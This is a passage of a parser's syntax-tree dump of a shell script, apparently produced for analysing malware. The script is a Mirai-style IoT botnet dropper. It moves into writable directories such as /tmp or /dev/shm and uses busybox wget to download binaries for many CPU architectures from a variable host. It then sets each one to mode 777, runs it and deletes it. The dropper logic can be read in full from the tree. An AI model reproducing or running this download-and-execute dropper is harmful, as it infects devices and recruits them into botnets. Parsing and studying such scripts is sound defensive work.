          WordNode(lineno=28, pos=(2015, 2024), word='./busybox'),
        ]),
        OperatorNode(lineno=28, op=';', pos=(2024, 2025)),
        CommandNode(lineno=28, pos=(2026, 2040), parts=[
          WordNode(lineno=28, pos=(2026, 2028), word='rm'),
          WordNode(lineno=28, pos=(2029, 2032), word='-rf'),
          WordNode(lineno=28, pos=(2033, 2040), word='busybox'),
        ]),
        OperatorNode(lineno=29, op='\n', pos=(2040, 2041)),
        CommandNode(lineno=29, pos=(2041, 2048), parts=[
          WordNode(lineno=29, pos=(2041, 2043), word='cd'),
          WordNode(lineno=29, pos=(2044, 2048), word='/tmp'),
        ]),
        OperatorNode(lineno=29, op='||', pos=(2049, 2051)),
        CommandNode(lineno=29, pos=(2052, 2063), parts=[
          WordNode(lineno=29, pos=(2052, 2054), word='cd'),
          WordNode(lineno=29, pos=(2055, 2063), word='/var/run'),
        ]),
        OperatorNode(lineno=29, op='||', pos=(2064, 2066)),
        CommandNode(lineno=29, pos=(2067, 2078), parts=[
          WordNode(lineno=29, pos=(2067, 2069), word='cd'),
          WordNode(lineno=29, pos=(2070, 2078), word='/dev/shm'),
        ]),
        OperatorNode(lineno=29, op='||', pos=(2079, 2081)),
        CommandNode(lineno=29, pos=(2082, 2089), parts=[
          WordNode(lineno=29, pos=(2082, 2084), word='cd'),
          WordNode(lineno=29, pos=(2085, 2089), word='/mnt'),
        ]),
        OperatorNode(lineno=29, op='||', pos=(2090, 2092)),
        CommandNode(lineno=29, pos=(2093, 2100), parts=[
          WordNode(lineno=29, pos=(2093, 2095), word='cd'),
          WordNode(lineno=29, pos=(2096, 2100), word='/var'),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2100, 2101)),
        CommandNode(lineno=29, pos=(2102, 2132), parts=[
          WordNode(lineno=29, pos=(2102, 2114), word='/bin/busybox'),
          WordNode(lineno=29, pos=(2115, 2117), word='cp'),
          WordNode(lineno=29, pos=(2118, 2130), word='/bin/busybox'),
          WordNode(lineno=29, pos=(2131, 2132), word='.'),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2132, 2133)),
        CommandNode(lineno=29, pos=(2134, 2163), parts=[
          WordNode(lineno=29, pos=(2134, 2146), word='/bin/busybox'),
          WordNode(lineno=29, pos=(2147, 2151), word='wget'),
          WordNode(lineno=29, pos=(2152, 2163), word='$path/$m68k', parts=[
            ParameterNode(lineno=29, pos=(2152, 2157), value='path'),
            ParameterNode(lineno=29, pos=(2158, 2163), value='m68k'),
          ]),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2163, 2164)),
        CommandNode(lineno=29, pos=(2165, 2197), parts=[
          WordNode(lineno=29, pos=(2165, 2177), word='/bin/busybox'),
          WordNode(lineno=29, pos=(2178, 2181), word='cat'),
          WordNode(lineno=29, pos=(2182, 2187), word='$m68k', parts=[
            ParameterNode(lineno=29, pos=(2182, 2187), value='m68k'),
          ]),
          RedirectNode(lineno=29, output=
            WordNode(lineno=29, pos=(2190, 2197), word='busybox'), pos=(2188, 2197), type='>'),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2197, 2198)),
        CommandNode(lineno=29, pos=(2199, 2229), parts=[
          WordNode(lineno=29, pos=(2199, 2211), word='/bin/busybox'),
          WordNode(lineno=29, pos=(2212, 2217), word='chmod'),
          WordNode(lineno=29, pos=(2218, 2221), word='777'),
          WordNode(lineno=29, pos=(2222, 2229), word='busybox'),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2229, 2230)),
        CommandNode(lineno=29, pos=(2231, 2240), parts=[
          WordNode(lineno=29, pos=(2231, 2240), word='./busybox'),
        ]),
        OperatorNode(lineno=29, op=';', pos=(2240, 2241)),
        CommandNode(lineno=29, pos=(2242, 2256), parts=[
          WordNode(lineno=29, pos=(2242, 2244), word='rm'),
          WordNode(lineno=29, pos=(2245, 2248), word='-rf'),
          WordNode(lineno=29, pos=(2249, 2256), word='busybox'),
        ]),
        OperatorNode(lineno=30, op='\n', pos=(2256, 2257)),
        CommandNode(lineno=30, pos=(2257, 2264), parts=[
          WordNode(lineno=30, pos=(2257, 2259), word='cd'),
          WordNode(lineno=30, pos=(2260, 2264), word='/tmp'),
        ]),
        OperatorNode(lineno=30, op='||', pos=(2265, 2267)),
        CommandNode(lineno=30, pos=(2268, 2279), parts=[
          WordNode(lineno=30, pos=(2268, 2270), word='cd'),
          WordNode(lineno=30, pos=(2271, 2279), word='/var/run'),
        ]),
        OperatorNode(lineno=30, op='||', pos=(2280, 2282)),
        CommandNode(lineno=30, pos=(2283, 2294), parts=[
          WordNode(lineno=30, pos=(2283, 2285), word='cd'),
          WordNode(lineno=30, pos=(2286, 2294), word='/dev/shm'),
        ]),
        OperatorNode(lineno=30, op='||', pos=(2295, 2297)),
        CommandNode(lineno=30, pos=(2298, 2305), parts=[
          WordNode(lineno=30, pos=(2298, 2300), word='cd'),
          WordNode(lineno=30, pos=(2301, 2305), word='/mnt'),
        ]),
        OperatorNode(lineno=30, op='||', pos=(2306, 2308)),
        CommandNode(lineno=30, pos=(2309, 2316), parts=[
          WordNode(lineno=30, pos=(2309, 2311), word='cd'),
          WordNode(lineno=30, pos=(2312, 2316), word='/var'),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2316, 2317)),
        CommandNode(lineno=30, pos=(2318, 2348), parts=[
          WordNode(lineno=30, pos=(2318, 2330), word='/bin/busybox'),
          WordNode(lineno=30, pos=(2331, 2333), word='cp'),
          WordNode(lineno=30, pos=(2334, 2346), word='/bin/busybox'),
          WordNode(lineno=30, pos=(2347, 2348), word='.'),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2348, 2349)),
        CommandNode(lineno=30, pos=(2350, 2378), parts=[
          WordNode(lineno=30, pos=(2350, 2362), word='/bin/busybox'),
          WordNode(lineno=30, pos=(2363, 2367), word='wget'),
          WordNode(lineno=30, pos=(2368, 2378), word='$path/$sh4', parts=[
            ParameterNode(lineno=30, pos=(2368, 2373), value='path'),
            ParameterNode(lineno=30, pos=(2374, 2378), value='sh4'),
          ]),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2378, 2379)),
        CommandNode(lineno=30, pos=(2380, 2411), parts=[
          WordNode(lineno=30, pos=(2380, 2392), word='/bin/busybox'),
          WordNode(lineno=30, pos=(2393, 2396), word='cat'),
          WordNode(lineno=30, pos=(2397, 2401), word='$sh4', parts=[
            ParameterNode(lineno=30, pos=(2397, 2401), value='sh4'),
          ]),
          RedirectNode(lineno=30, output=
            WordNode(lineno=30, pos=(2404, 2411), word='busybox'), pos=(2402, 2411), type='>'),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2411, 2412)),
        CommandNode(lineno=30, pos=(2413, 2443), parts=[
          WordNode(lineno=30, pos=(2413, 2425), word='/bin/busybox'),
          WordNode(lineno=30, pos=(2426, 2431), word='chmod'),
          WordNode(lineno=30, pos=(2432, 2435), word='777'),
          WordNode(lineno=30, pos=(2436, 2443), word='busybox'),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2443, 2444)),
        CommandNode(lineno=30, pos=(2445, 2454), parts=[
          WordNode(lineno=30, pos=(2445, 2454), word='./busybox'),
        ]),
        OperatorNode(lineno=30, op=';', pos=(2454, 2455)),
        CommandNode(lineno=30, pos=(2456, 2470), parts=[
          WordNode(lineno=30, pos=(2456, 2458), word='rm'),
          WordNode(lineno=30, pos=(2459, 2462), word='-rf'),
          WordNode(lineno=30, pos=(2463, 2470), word='busybox'),
        ]),
        OperatorNode(lineno=31, op='\n', pos=(2470, 2471)),
        CommandNode(lineno=31, pos=(2471, 2478), parts=[
          WordNode(lineno=31, pos=(2471, 2473), word='cd'),
          WordNode(lineno=31, pos=(2474, 2478), word='/tmp'),
        ]),
        OperatorNode(lineno=31, op='||', pos=(2479, 2481)),
        CommandNode(lineno=31, pos=(2482, 2493), parts=[
          WordNode(lineno=31, pos=(2482, 2484), word='cd'),
          WordNode(lineno=31, pos=(2485, 2493), word='/var/run'),
        ]),
        OperatorNode(lineno=31, op='||', pos=(2494, 2496)),
        CommandNode(lineno=31, pos=(2497, 2508), parts=[
          WordNode(lineno=31, pos=(2497, 2499), word='cd'),
          WordNode(lineno=31, pos=(2500, 2508), word='/dev/shm'),
        ]),
        OperatorNode(lineno=31, op='||', pos=(2509, 2511)),
        CommandNode(lineno=31, pos=(2512, 2519), parts=[
          WordNode(lineno=31, pos=(2512, 2514), word='cd'),
          WordNode(lineno=31, pos=(2515, 2519), word='/mnt'),
        ]),
        OperatorNode(lineno=31, op='||', pos=(2520, 2522)),
        CommandNode(lineno=31, pos=(2523, 2530), parts=[
          WordNode(lineno=31, pos=(2523, 2525), word='cd'),
          WordNode(lineno=31, pos=(2526, 2530), word='/var'),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2530, 2531)),
        CommandNode(lineno=31, pos=(2532, 2562), parts=[
          WordNode(lineno=31, pos=(2532, 2544), word='/bin/busybox'),
          WordNode(lineno=31, pos=(2545, 2547), word='cp'),
          WordNode(lineno=31, pos=(2548, 2560), word='/bin/busybox'),
          WordNode(lineno=31, pos=(2561, 2562), word='.'),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2562, 2563)),
        CommandNode(lineno=31, pos=(2564, 2596), parts=[
          WordNode(lineno=31, pos=(2564, 2576), word='/bin/busybox'),
          WordNode(lineno=31, pos=(2577, 2581), word='wget'),
          WordNode(lineno=31, pos=(2582, 2596), word='$path/$powerpc', parts=[
            ParameterNode(lineno=31, pos=(2582, 2587), value='path'),
            ParameterNode(lineno=31, pos=(2588, 2596), value='powerpc'),
          ]),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2596, 2597)),
        CommandNode(lineno=31, pos=(2598, 2633), parts=[
          WordNode(lineno=31, pos=(2598, 2610), word='/bin/busybox'),
          WordNode(lineno=31, pos=(2611, 2614), word='cat'),
          WordNode(lineno=31, pos=(2615, 2623), word='$powerpc', parts=[
            ParameterNode(lineno=31, pos=(2615, 2623), value='powerpc'),
          ]),
          RedirectNode(lineno=31, output=
            WordNode(lineno=31, pos=(2626, 2633), word='busybox'), pos=(2624, 2633), type='>'),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2633, 2634)),
        CommandNode(lineno=31, pos=(2635, 2665), parts=[
          WordNode(lineno=31, pos=(2635, 2647), word='/bin/busybox'),
          WordNode(lineno=31, pos=(2648, 2653), word='chmod'),
          WordNode(lineno=31, pos=(2654, 2657), word='777'),
          WordNode(lineno=31, pos=(2658, 2665), word='busybox'),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2665, 2666)),
        CommandNode(lineno=31, pos=(2667, 2676), parts=[
          WordNode(lineno=31, pos=(2667, 2676), word='./busybox'),
        ]),
        OperatorNode(lineno=31, op=';', pos=(2676, 2677)),
        CommandNode(lineno=31, pos=(2678, 2692), parts=[
          WordNode(lineno=31, pos=(2678, 2680), word='rm'),
          WordNode(lineno=31, pos=(2681, 2684), word='-rf'),
          WordNode(lineno=31, pos=(2685, 2692), word='busybox'),
        ]),
        OperatorNode(lineno=32, op='\n', pos=(2692, 2693)),
        CommandNode(lineno=32, pos=(2693, 2700), parts=[
          WordNode(lineno=32, pos=(2693, 2695), word='cd'),
          WordNode(lineno=32, pos=(2696, 2700), word='/tmp'),
        ]),
        OperatorNode(lineno=32, op='||', pos=(2701, 2703)),
        CommandNode(lineno=32, pos=(2704, 2715), parts=[
          WordNode(lineno=32, pos=(2704, 2706), word='cd'),
          WordNode(lineno=32, pos=(2707, 2715), word='/var/run'),
        ]),
        OperatorNode(lineno=32, op='||', pos=(2716, 2718)),
        CommandNode(lineno=32, pos=(2719, 2730), parts=[
          WordNode(lineno=32, pos=(2719, 2721), word='cd'),
          WordNode(lineno=32, pos=(2722, 2730), word='/dev/shm'),
        ]),
        OperatorNode(lineno=32, op='||', pos=(2731, 2733)),
        CommandNode(lineno=32, pos=(2734, 2741), parts=[
          WordNode(lineno=32, pos=(2734, 2736), word='cd'),
          WordNode(lineno=32, pos=(2737, 2741), word='/mnt'),
        ]),
        OperatorNode(lineno=32, op='||', pos=(2742, 2744)),
        CommandNode(lineno=32, pos=(2745, 2752), parts=[
          WordNode(lineno=32, pos=(2745, 2747), word='cd'),
          WordNode(lineno=32, pos=(2748, 2752), word='/var'),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2752, 2753)),
        CommandNode(lineno=32, pos=(2754, 2784), parts=[
          WordNode(lineno=32, pos=(2754, 2766), word='/bin/busybox'),
          WordNode(lineno=32, pos=(2767, 2769), word='cp'),
          WordNode(lineno=32, pos=(2770, 2782), word='/bin/busybox'),
          WordNode(lineno=32, pos=(2783, 2784), word='.'),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2784, 2785)),
        CommandNode(lineno=32, pos=(2786, 2823), parts=[
          WordNode(lineno=32, pos=(2786, 2798), word='/bin/busybox'),
          WordNode(lineno=32, pos=(2799, 2803), word='wget'),
          WordNode(lineno=32, pos=(2804, 2823), word='$path/$powerpc440fp', parts=[
            ParameterNode(lineno=32, pos=(2804, 2809), value='path'),
            ParameterNode(lineno=32, pos=(2810, 2823), value='powerpc440fp'),
          ]),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2823, 2824)),
        CommandNode(lineno=32, pos=(2825, 2865), parts=[
          WordNode(lineno=32, pos=(2825, 2837), word='/bin/busybox'),
          WordNode(lineno=32, pos=(2838, 2841), word='cat'),
          WordNode(lineno=32, pos=(2842, 2855), word='$powerpc440fp', parts=[
            ParameterNode(lineno=32, pos=(2842, 2855), value='powerpc440fp'),
          ]),
          RedirectNode(lineno=32, output=
            WordNode(lineno=32, pos=(2858, 2865), word='busybox'), pos=(2856, 2865), type='>'),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2865, 2866)),
        CommandNode(lineno=32, pos=(2867, 2897), parts=[
          WordNode(lineno=32, pos=(2867, 2879), word='/bin/busybox'),
          WordNode(lineno=32, pos=(2880, 2885), word='chmod'),
          WordNode(lineno=32, pos=(2886, 2889), word='777'),
          WordNode(lineno=32, pos=(2890, 2897), word='busybox'),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2897, 2898)),
        CommandNode(lineno=32, pos=(2899, 2908), parts=[
          WordNode(lineno=32, pos=(2899, 2908), word='./busybox'),
        ]),
        OperatorNode(lineno=32, op=';', pos=(2908, 2909)),
        CommandNode(lineno=32, pos=(2910, 2924), parts=[
          WordNode(lineno=32, pos=(2910, 2912), word='rm'),
          WordNode(lineno=32, pos=(2913, 2916), word='-rf'),
          WordNode(lineno=32, pos=(2917, 2924), word='busybox'),
        ]),
        OperatorNode(lineno=33, op='\n', pos=(2924, 2925)),
        CommandNode(lineno=33, pos=(2925, 2932), parts=[
          WordNode(lineno=33, pos=(2925, 2927), word='cd'),
          WordNode(lineno=33, pos=(2928, 2932), word='/tmp'),
        ]),
        OperatorNode(lineno=33, op='||', pos=(2933, 2935)),
        CommandNode(lineno=33, pos=(2936, 2947), parts=[
          WordNode(lineno=33, pos=(2936, 2938), word='cd'),
          WordNode(lineno=33, pos=(2939, 2947), word='/var/run'),
        ]),
        OperatorNode(lineno=33, op='||', pos=(2948, 2950)),
        CommandNode(lineno=33, pos=(2951, 2962), parts=[
          WordNode(lineno=33, pos=(2951, 2953), word='cd'),
          WordNode(lineno=33, pos=(2954, 2962), word='/dev/shm'),
        ]),
        OperatorNode(lineno=33, op='||', pos=(2963, 2965)),
        CommandNode(lineno=33, pos=(2966, 2973), parts=[
          WordNode(lineno=33, pos=(2966, 2968), word='cd'),
          WordNode(lineno=33, pos=(2969, 2973), word='/mnt'),
        ]),
        OperatorNode(lineno=33, op='||', pos=(2974, 2976)),
        CommandNode(lineno=33, pos=(2977, 2984), parts=[
          WordNode(lineno=33, pos=(2977, 2979), word='cd'),
          WordNode(lineno=33, pos=(2980, 2984), word='/var'),
        ]),
        OperatorNode(lineno=33, op=';', pos=(2984, 2985)),
        CommandNode(lineno=33, pos=(2986, 3016), parts=[
          WordNode(lineno=33, pos=(2986, 2998), word='/bin/busybox'),
          WordNode(lineno=33, pos=(2999, 3001), word='cp'),
          WordNode(lineno=33, pos=(3002, 3014), word='/bin/busybox'),
          WordNode(lineno=33, pos=(3015, 3016), word='.'),
        ]),
        OperatorNode(lineno=33, op=';', pos=(3016, 3017)),
        CommandNode(lineno=33, pos=(3018, 3049), parts=[
          WordNode(lineno=33, pos=(3018, 3030), word='/bin/busybox'),
          WordNode(lineno=33, pos=(3031, 3035), word='wget'),
          WordNode(lineno=33, pos=(3036, 3049), word='$path/$x86_64', parts=[
            ParameterNode(lineno=33, pos=(3036, 3041), value='path'),
            ParameterNode(lineno=33, pos=(3042, 3049), value='x86_64'),
          ]),
        ]),
        OperatorNode(lineno=33, op=';', pos=(3049, 3050)),
        CommandNode(lineno=33, pos=(3051, 3085), parts=[
          WordNode(lineno=33, pos=(3051, 3063), word='/bin/busybox'),
          WordNode(lineno=33, pos=(3064, 3067), word='cat'),
          WordNode(lineno=33, pos=(3068, 3075), word='$x86_64', parts=[
            ParameterNode(lineno=33, pos=(3068, 3075), value='x86_64'),
          ]),
          RedirectNode(lineno=33, output=
            WordNode(lineno=33, pos=(3078, 3085), word='busybox'), pos=(3076, 3085), type='>'),
        ]),
        OperatorNode(lineno=33, op=';', pos=(3085, 3086)),
        CommandNode(lineno=33, pos=(3087, 3117), parts=[
          WordNode(lineno=33, pos=(3087, 3099), word='/bin/busybox'),
          WordNode(lineno=33, pos=(3100, 3105), word='chmod'),
          WordNode(lineno=33, pos=(3106, 3109), word='777'),
          WordNode(lineno=33, pos=(3110, 3117), word='busybox'),
        ]),
        OperatorNode(lineno=33, op=';', pos=(3117, 3118)),
        CommandNode(lineno=33, pos=(3119, 3128), parts=[
          WordNode(lineno=33, pos=(3119, 3128), word='./busybox'),
        ]),
        OperatorNode(lineno=33, op=';', pos=(3128, 3129)),
        CommandNode(lineno=33, pos=(3130, 3144), parts=[
          WordNode(lineno=33, pos=(3130, 3132), word='rm'),
          WordNode(lineno=33, pos=(3133, 3136), word='-rf'),
          WordNode(lineno=33, pos=(3137, 3144), word='busybox'),
        ]),
        OperatorNode(lineno=34, op='\n', pos=(3144, 3145)),
      ]),
    ReservedwordNode(lineno=34, pos=(3145, 3149), word='else'),
    ListNode(lineno=48, pos=(3150, 4772), parts=[
        CommandNode(lineno=35, pos=(3150, 3157), parts=[
          WordNode(lineno=35, pos=(3150, 3152), word='cd'),
          WordNode(lineno=35, pos=(3153, 3157), word='/tmp'),
        ]),
        OperatorNode(lineno=35, op='||', pos=(3158, 3160)),
        CommandNode(lineno=35, pos=(3161, 3172), parts=[
          WordNode(lineno=35, pos=(3161, 3163), word='cd'),
          WordNode(lineno=35, pos=(3164, 3172), word='/var/run'),
        ]),
        OperatorNode(lineno=35, op='||', pos=(3173, 3175)),
        CommandNode(lineno=35, pos=(3176, 3187), parts=[
          WordNode(lineno=35, pos=(3176, 3178), word='cd'),
          WordNode(lineno=35, pos=(3179, 3187), word='/dev/shm'),
        ]),
        OperatorNode(lineno=35, op='||', pos=(3188, 3190)),
        CommandNode(lineno=35, pos=(3191, 3198), parts=[
          WordNode(lineno=35, pos=(3191, 3193), word='cd'),
          WordNode(lineno=35, pos=(3194, 3198), word='/mnt'),
        ]),
        OperatorNode(lineno=35, op='||', pos=(3199, 3201)),
        CommandNode(lineno=35, pos=(3202, 3209), parts=[
          WordNode(lineno=35, pos=(3202, 3204), word='cd'),
          WordNode(lineno=35, pos=(3205, 3209), word='/var'),
        ]),
        OperatorNode(lineno=35, op=';', pos=(3209, 3210)),
        CommandNode(lineno=35, pos=(3211, 3227), parts=[
          WordNode(lineno=35, pos=(3211, 3215), word='wget'),
          WordNode(lineno=35, pos=(3216, 3227), word='$path/$mips', parts=[
            ParameterNode(lineno=35, pos=(3216, 3221), value='path'),
            ParameterNode(lineno=35, pos=(3222, 3227), value='mips'),
          ]),
        ]),
        OperatorNode(lineno=35, op=';', pos=(3227, 3228)),
        CommandNode(lineno=35, pos=(3229, 3244), parts=[
          WordNode(lineno=35, pos=(3229, 3234), word='chmod'),
          WordNode(lineno=35, pos=(3235, 3238), word='777'),
          WordNode(lineno=35, pos=(3239, 3244), word='$mips', parts=[
            ParameterNode(lineno=35, pos=(3239, 3244), value='mips'),
          ]),
        ]),
        OperatorNode(lineno=35, op=';', pos=(3244, 3245)),
        CommandNode(lineno=35, pos=(3246, 3253), parts=[
          WordNode(lineno=35, pos=(3246, 3253), word='./$mips', parts=[
            ParameterNode(lineno=35, pos=(3248, 3253), value='mips'),
          ]),
        ]),
        OperatorNode(lineno=35, op=';', pos=(3253, 3254)),
        CommandNode(lineno=35, pos=(3255, 3267), parts=[
          WordNode(lineno=35, pos=(3255, 3257), word='rm'),
          WordNode(lineno=35, pos=(3258, 3261), word='-rf'),
          WordNode(lineno=35, pos=(3262, 3267), word='$mips', parts=[
            ParameterNode(lineno=35, pos=(3262, 3267), value='mips'),
          ]),
        ]),
        OperatorNode(lineno=36, op='\n', pos=(3267, 3268)),
        CommandNode(lineno=36, pos=(3268, 3275), parts=[
          WordNode(lineno=36, pos=(3268, 3270), word='cd'),
          WordNode(lineno=36, pos=(3271, 3275), word='/tmp'),
        ]),
        OperatorNode(lineno=36, op='||', pos=(3276, 3278)),
        CommandNode(lineno=36, pos=(3279, 3290), parts=[
          WordNode(lineno=36, pos=(3279, 3281), word='cd'),
          WordNode(lineno=36, pos=(3282, 3290), word='/var/run'),
        ]),
        OperatorNode(lineno=36, op='||', pos=(3291, 3293)),
        CommandNode(lineno=36, pos=(3294, 3305), parts=[
          WordNode(lineno=36, pos=(3294, 3296), word='cd'),
          WordNode(lineno=36, pos=(3297, 3305), word='/dev/shm'),
        ]),
        OperatorNode(lineno=36, op='||', pos=(3306, 3308)),
        CommandNode(lineno=36, pos=(3309, 3316), parts=[
          WordNode(lineno=36, pos=(3309, 3311), word='cd'),
          WordNode(lineno=36, pos=(3312, 3316), word='/mnt'),
        ]),
        OperatorNode(lineno=36, op='||', pos=(3317, 3319)),
        CommandNode(lineno=36, pos=(3320, 3327), parts=[
          WordNode(lineno=36, pos=(3320, 3322), word='cd'),
          WordNode(lineno=36, pos=(3323, 3327), word='/var'),
        ]),
        OperatorNode(lineno=36, op=';', pos=(3327, 3328)),
        CommandNode(lineno=36, pos=(3329, 3347), parts=[
          WordNode(lineno=36, pos=(3329, 3333), word='wget'),
          WordNode(lineno=36, pos=(3334, 3347), word='$path/$mipsel', parts=[
            ParameterNode(lineno=36, pos=(3334, 3339), value='path'),
            ParameterNode(lineno=36, pos=(3340, 3347), value='mipsel'),
          ]),
        ]),
        OperatorNode(lineno=36, op=';', pos=(3347, 3348)),
        CommandNode(lineno=36, pos=(3349, 3366), parts=[
          WordNode(lineno=36, pos=(3349, 3354), word='chmod'),
          WordNode(lineno=36, pos=(3355, 3358), word='777'),
          WordNode(lineno=36, pos=(3359, 3366), word='$mipsel', parts=[
            ParameterNode(lineno=36, pos=(3359, 3366), value='mipsel'),
          ]),
        ]),
        OperatorNode(lineno=36, op=';', pos=(3366, 3367)),
        CommandNode(lineno=36, pos=(3368, 3377), parts=[
          WordNode(lineno=36, pos=(3368, 3377), word='./$mipsel', parts=[
            ParameterNode(lineno=36, pos=(3370, 3377), value='mipsel'),
          ]),
        ]),
        OperatorNode(lineno=36, op=';', pos=(3377, 3378)),
        CommandNode(lineno=36, pos=(3379, 3393), parts=[
          WordNode(lineno=36, pos=(3379, 3381), word='rm'),
          WordNode(lineno=36, pos=(3382, 3385), word='-rf'),
          WordNode(lineno=36, pos=(3386, 3393), word='$mipsel', parts=[
            ParameterNode(lineno=36, pos=(3386, 3393), value='mipsel'),
          ]),
        ]),
        OperatorNode(lineno=37, op='\n', pos=(3393, 3394)),
        CommandNode(lineno=37, pos=(3394, 3401), parts=[
          WordNode(lineno=37, pos=(3394, 3396), word='cd'),
          WordNode(lineno=37, pos=(3397, 3401), word='/tmp'),
        ]),
        OperatorNode(lineno=37, op='||', pos=(3402, 3404)),
        CommandNode(lineno=37, pos=(3405, 3416), parts=[
          WordNode(lineno=37, pos=(3405, 3407), word='cd'),
          WordNode(lineno=37, pos=(3408, 3416), word='/var/run'),
        ]),
        OperatorNode(lineno=37, op='||', pos=(3417, 3419)),
        CommandNode(lineno=37, pos=(3420, 3431), parts=[
          WordNode(lineno=37, pos=(3420, 3422), word='cd'),
          WordNode(lineno=37, pos=(3423, 3431), word='/dev/shm'),
        ]),
        OperatorNode(lineno=37, op='||', pos=(3432, 3434)),
        CommandNode(lineno=37, pos=(3435, 3442), parts=[
          WordNode(lineno=37, pos=(3435, 3437), word='cd'),
          WordNode(lineno=37, pos=(3438, 3442), word='/mnt'),
        ]),
        OperatorNode(lineno=37, op='||', pos=(3443, 3445)),
        CommandNode(lineno=37, pos=(3446, 3453), parts=[
          WordNode(lineno=37, pos=(3446, 3448), word='cd'),
          WordNode(lineno=37, pos=(3449, 3453), word='/var'),
        ]),
        OperatorNode(lineno=37, op=';', pos=(3453, 3454)),
        CommandNode(lineno=37, pos=(3455, 3473), parts=[
          WordNode(lineno=37, pos=(3455, 3459), word='wget'),
          WordNode(lineno=37, pos=(3460, 3473), word='$path/$armv4l', parts=[
            ParameterNode(lineno=37, pos=(3460, 3465), value='path'),
            ParameterNode(lineno=37, pos=(3466, 3473), value='armv4l'),
          ]),
        ]),
        OperatorNode(lineno=37, op=';', pos=(3473, 3474)),
        CommandNode(lineno=37, pos=(3475, 3492), parts=[
          WordNode(lineno=37, pos=(3475, 3480), word='chmod'),
          WordNode(lineno=37, pos=(3481, 3484), word='777'),
          WordNode(lineno=37, pos=(3485, 3492), word='$armv4l', parts=[
            ParameterNode(lineno=37, pos=(3485, 3492), value='armv4l'),
          ]),
        ]),
        OperatorNode(lineno=37, op=';', pos=(3492, 3493)),
        CommandNode(lineno=37, pos=(3494, 3503), parts=[
          WordNode(lineno=37, pos=(3494, 3503), word='./$armv4l', parts=[
            ParameterNode(lineno=37, pos=(3496, 3503), value='armv4l'),
          ]),
        ]),
        OperatorNode(lineno=37, op=';', pos=(3503, 3504)),
        CommandNode(lineno=37, pos=(3505, 3519), parts=[
          WordNode(lineno=37, pos=(3505, 3507), word='rm'),
          WordNode(lineno=37, pos=(3508, 3511), word='-rf'),
          WordNode(lineno=37, pos=(3512, 3519), word='$armv4l', parts=[
            ParameterNode(lineno=37, pos=(3512, 3519), value='armv4l'),
          ]),
        ]),
        OperatorNode(lineno=38, op='\n', pos=(3519, 3520)),
        CommandNode(lineno=38, pos=(3520, 3527), parts=[
          WordNode(lineno=38, pos=(3520, 3522), word='cd'),
          WordNode(lineno=38, pos=(3523, 3527), word='/tmp'),
        ]),
        OperatorNode(lineno=38, op='||', pos=(3528, 3530)),
        CommandNode(lineno=38, pos=(3531, 3542), parts=[
          WordNode(lineno=38, pos=(3531, 3533), word='cd'),
          WordNode(lineno=38, pos=(3534, 3542), word='/var/run'),
        ]),
        OperatorNode(lineno=38, op='||', pos=(3543, 3545)),
        CommandNode(lineno=38, pos=(3546, 3557), parts=[
          WordNode(lineno=38, pos=(3546, 3548), word='cd'),
          WordNode(lineno=38, pos=(3549, 3557), word='/dev/shm'),
        ]),
        OperatorNode(lineno=38, op='||', pos=(3558, 3560)),
        CommandNode(lineno=38, pos=(3561, 3568), parts=[
          WordNode(lineno=38, pos=(3561, 3563), word='cd'),
          WordNode(lineno=38, pos=(3564, 3568), word='/mnt'),
        ]),
        OperatorNode(lineno=38, op='||', pos=(3569, 3571)),
        CommandNode(lineno=38, pos=(3572, 3579), parts=[
          WordNode(lineno=38, pos=(3572, 3574), word='cd'),
          WordNode(lineno=38, pos=(3575, 3579), word='/var'),
        ]),
        OperatorNode(lineno=38, op=';', pos=(3579, 3580)),
        CommandNode(lineno=38, pos=(3581, 3599), parts=[
          WordNode(lineno=38, pos=(3581, 3585), word='wget'),
          WordNode(lineno=38, pos=(3586, 3599), word='$path/$armv5l', parts=[
            ParameterNode(lineno=38, pos=(3586, 3591), value='path'),
            ParameterNode(lineno=38, pos=(3592, 3599), value='armv5l'),
          ]),
        ]),
        OperatorNode(lineno=38, op=';', pos=(3599, 3600)),
        CommandNode(lineno=38, pos=(3601, 3618), parts=[
          WordNode(lineno=38, pos=(3601, 3606), word='chmod'),
          WordNode(lineno=38, pos=(3607, 3610), word='777'),
          WordNode(lineno=38, pos=(3611, 3618), word='$armv5l', parts=[
            ParameterNode(lineno=38, pos=(3611, 3618), value='armv5l'),
          ]),
        ]),
        OperatorNode(lineno=38, op=';', pos=(3618, 3619)),
        CommandNode(lineno=38, pos=(3620, 3629), parts=[
          WordNode(lineno=38, pos=(3620, 3629), word='./$armv5l', parts=[
            ParameterNode(lineno=38, pos=(3622, 3629), value='armv5l'),
          ]),
        ]),
        OperatorNode(lineno=38, op=';', pos=(3629, 3630)),
        CommandNode(lineno=38, pos=(3631, 3645), parts=[
          WordNode(lineno=38, pos=(3631, 3633), word='rm'),
          WordNode(lineno=38, pos=(3634, 3637), word='-rf'),
          WordNode(lineno=38, pos=(3638, 3645), word='$armv5l', parts=[
            ParameterNode(lineno=38, pos=(3638, 3645), value='armv5l'),
          ]),
        ]),
        OperatorNode(lineno=39, op='\n', pos=(3645, 3646)),
        CommandNode(lineno=39, pos=(3646, 3653), parts=[
          WordNode(lineno=39, pos=(3646, 3648), word='cd'),
          WordNode(lineno=39, pos=(3649, 3653), word='/tmp'),
        ]),
        OperatorNode(lineno=39, op='||', pos=(3654, 3656)),
        CommandNode(lineno=39, pos=(3657, 3668), parts=[
          WordNode(lineno=39, pos=(3657, 3659), word='cd'),
          WordNode(lineno=39, pos=(3660, 3668), word='/var/run'),
        ]),
        OperatorNode(lineno=39, op='||', pos=(3669, 3671)),
